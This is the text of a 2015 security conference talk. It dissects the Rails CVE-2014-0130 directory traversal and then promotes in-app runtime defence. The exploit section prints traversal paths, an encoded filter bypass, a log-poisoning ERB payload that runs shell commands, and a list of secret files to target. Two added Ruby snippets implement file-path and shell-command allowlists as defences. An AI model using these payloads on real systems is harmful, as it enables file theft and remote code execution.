Protecting the Web From Within
Mike Milner
CTO @immunio
GoSec 2015
Today
Checked in to my flight
Read the News
Paid for Parking
Coffee with the Starbucks app
Boarding Pass Slack
Gmail
Review some Pull Requests Uber
GoSec Schedule
Trello
Banking
Facebook
Twitter
Ashley Madison
TOP SECRET
Security Clearance
with the OPM
All Online
Who is protecting
my data?
How?
Framework up to Date?
Libraries Patched?
Code Reviewed for Security?
Monitoring for New CVEs?
Reviewed External libraries?
Static Analysis?
Fixed Insecure Defaults?
Security is Hard
But it can be
SOOO
Interesting :)
CVE-2014-0130
“Directory traversal vulnerability”
Credited to Ville Lautanala of Flowdock
expanded on by Jeff Jarmoc @ Matasano
http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0130
Directory Traversal
Vulnerable Route with globbing:
get 'my_url/*action', controller: 'asdf'
*action should be an action (method) name, or a template file name under
RAILS_ROOT/app/views/<controller_name>/
What if I try: my_url/../../../Gemfile
Directory Traversal
• /etc/passwd
• RAILS_ROOT/config/secrets.yml
• RAILS_ROOT/config/initializers/secret_token.rb
• SSL certificates
• /proc/self/environ
• /proc/<pid>/environ
Yikes!
Directory Traversal
Recommendation - use non-globbing route:
get 'my_url/:action', controller: 'asdf'
Something like ../../../Gemfile won’t match
BUT!
Route matching happens BEFORE URI decoding, so this still matches:
my_url/%2e%2e%2f%2e%2e%2f%2e%2e%2fGemfile
Can We Execute Code?
“Helpful” default behaviour in Rails
Unknown extension defaults to ERB template
<%= `whoami` %>
Basics
Write code into file
Ask Rails to execute it
Getting Code into a File
Rails does this for us!
/some/page?mycode=1234
Written to production.log
/some/page?mycode=%3c%25%3d%20%60%69%64%60%20%25%3e
Decodes to: <%= `id` %>
Putting it Together
/my_url/../../../production.log?mycode=<%= `whoami` %>
/my_url/%2e%2e%2f%2e%2e%2f%2e%2e%2flog%2fproduction%2elog?mycode=%3c%25%3d%20%60%69%64%60%20%25%3e
How to Defend?
Upgrade Rails - fixed in 4.1.1, 4.0.5, 3.2.18
Scan your code - Brakeman >= 2.5.1
Use recommended workarounds
Only helps AFTER the vulnerability is announced!
Active Defence
Signature Based
Hard to maintain, Easy to bypass
WAF?
WAF?
Helpful bypass included in CVE!
Add ruby escape characters to traversal to hide:
../../../Gemfile
Active Defence
What was the actual exploit?
A file was read that shouldn’t be read
Shell commands were executed
Move INSIDE the app and we can see these directly
Protect against the exploit
• Uploaded images should not be executed as code
• Don’t load configuration from /tmp
• My app does NOT need to read or write anywhere inside /etc
• In fact, the app shouldn't be writing anywhere except /tmp and /var/log
• And especially not be reading from /etc/ssl or ~/.ssh/id_rsa
Track code that opens files
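An added example (not from the slides) that ties together the two points above: decode the route segment before checking it, and confine which files the app may open. The roots (/srv/app, the 'asdf' controller's views directory, /home/app/.ssh standing in for ~/.ssh) are constructed placeholders.

```ruby
require "uri"

# Added example, not from the slides. Roots are constructed placeholders.
APP_ROOT   = "/srv/app"
VIEWS_DIR  = "#{APP_ROOT}/app/views/asdf"           # the 'asdf' controller
WRITE_OK   = ["/tmp", "/var/log"]
NEVER_READ = ["/etc", "/home/app/.ssh"]             # stand-in for ~/.ssh

# Lexical canonicalisation: collapses "." and ".." without touching disk,
# so the check also works for files that do not exist yet.
def canonical(path)
  File.expand_path(path)
end

# true when path is root itself or lies beneath it
def under?(root, path)
  root = canonical(root)
  path == root || path.start_with?(root + "/")
end

# Resolve the *action segment the safe way: decode URI escapes FIRST,
# then allow only a plain identifier, then confirm the resolved path
# is still inside the controller's views directory.
def resolve_action(raw_segment)
  decoded = URI.decode_www_form_component(raw_segment)
  return nil unless decoded.match?(/\A[a-z_][a-z0-9_]*\z/)
  full = canonical(File.join(VIEWS_DIR, decoded))
  under?(VIEWS_DIR, full) ? full : nil
rescue ArgumentError                                # malformed %-escape
  nil
end

# Policy consulted on every open(): templates come only from VIEWS_DIR,
# other reads stay inside APP_ROOT and never touch sensitive roots,
# writes go only to /tmp or /var/log.
def open_allowed?(path, mode)
  full = canonical(path)
  return false if NEVER_READ.any? { |r| under?(r, full) }
  case mode
  when :template then under?(VIEWS_DIR, full)
  when :read     then under?(APP_ROOT, full)
  when :write    then WRITE_OK.any? { |r| under?(r, full) }
  else false
  end
end
```

With the :template mode, a log file under the app root can still be read as a log but is refused as a template, which is the step the CVE-2014-0130 chain depends on.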
Protect against the exploit
• Most apps don’t need to execute shell commands.
FENCE IT OFF!
• If you do need shell, track the code that runs commands.
• The command that minifies my CSS should not be downloading and executing a perl script!
• The command that sends an invoice should not be opening a reverse shell to Russia!
• And block shell access from everywhere else.
Track shell code execution
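An added example (not from the slides) of "track the code that runs commands": a per-call-site allowlist of shell commands, consulted by a wrapper the app uses instead of Kernel#system. The file names and command patterns are constructed placeholders.

```ruby
# Added example, not from the slides. Call sites and patterns are
# constructed placeholders for the two commands the slide mentions.
SHELL_POLICY = {
  "lib/assets.rb"   => [/\Auglifyjs\s+\S+\.js\z/],            # asset minifier
  "lib/invoices.rb" => [/\Awkhtmltopdf\s+\S+\s+\S+\.pdf\z/],  # invoice PDF
}.freeze

# Pure check: may this exact command run from this call site?
# A call site with no entry is fenced off entirely.
def shell_allowed?(command, call_site)
  patterns = SHELL_POLICY[call_site]
  return false if patterns.nil?
  patterns.any? { |re| re.match?(command) }
end

# Wrapper used in place of Kernel#system: identifies the caller's source
# file relative to the app root and consults the policy before running.
def guarded_system(command, app_root: Dir.pwd)
  loc  = caller_locations(1, 1).first
  site = loc.path.sub(%r{\A#{Regexp.escape(app_root)}/}, "")
  unless shell_allowed?(command, site)
    raise SecurityError, "shell blocked from #{site}: #{command.inspect}"
  end
  system(command)
end
```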
Inside the App
Much more accurate. Fewer false positives.
• SQL Queries for SQL Injection
• Template rendering for Cross Site Scripting
• Authentication attacks and Brute Forcing
• Cross Site Request Forgery
Real-time web application security
Automatic detection and protection against app security vulnerabilities
Java Python Ruby
2 Minute Install
Thank You!
Mike Milner
CTO @immunio
GoSec 2015